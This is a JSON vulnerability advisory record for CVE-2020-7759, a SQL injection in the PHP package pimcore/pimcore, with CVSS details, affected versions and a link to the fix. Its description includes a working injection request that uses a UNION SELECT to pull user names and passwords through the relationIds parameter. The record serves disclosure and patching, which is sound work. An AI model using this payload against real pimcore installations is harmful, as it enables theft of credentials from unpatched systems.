{"id":"CVE-2020-7759","aliases":["GHSA-8jmh-c6vr-pmvm","SNYK-PHP-PIMCOREPIMCORE-1017405"],"url":"https://o3.security/vulnerability/CVE-2020-7759","summary":"SQL Injection in pimcore","details":"The package pimcore/pimcore from 6.7.2 and before 6.8.3 are vulnerable to SQL Injection in data classification functionality in ClassificationstoreController. This can be exploited by sending a specifically-crafted input in the relationIds parameter as demonstrated by the following request: http://vulnerable.pimcore.example/admin/classificationstore/relations?relationIds=[{\"keyId\"%3a\"''\",\"groupId\"%3a\"'asd'))+or+1%3d1+union+(select+1,2,3,4,5,6,name,8,password,'',11,12,'',14+from+users)+--+\"}]","published":"2020-10-30T11:15:12.523Z","modified":"2026-08-07T19:48:29.135447Z","cvss":{"score":7.2,"severity":"HIGH","vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},"epss":null,"cisaKev":null,"exploitsKnown":null,"affectedPackages":[{"ecosystem":"Packagist","name":"pimcore/pimcore","fixedVersion":"6.8.3"}],"fix":{"url":"https://github.com/pimcore/pimcore/pull/7315","label":"pimcore/pimcore#7315"},"references":[{"type":"ADVISORY","url":"https://snyk.io/vuln/SNYK-PHP-PIMCOREPIMCORE-1017405"},{"type":"FIX","url":"https://github.com/pimcore/pimcore/pull/7315"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-08-07T19:48:29.135447Z"}}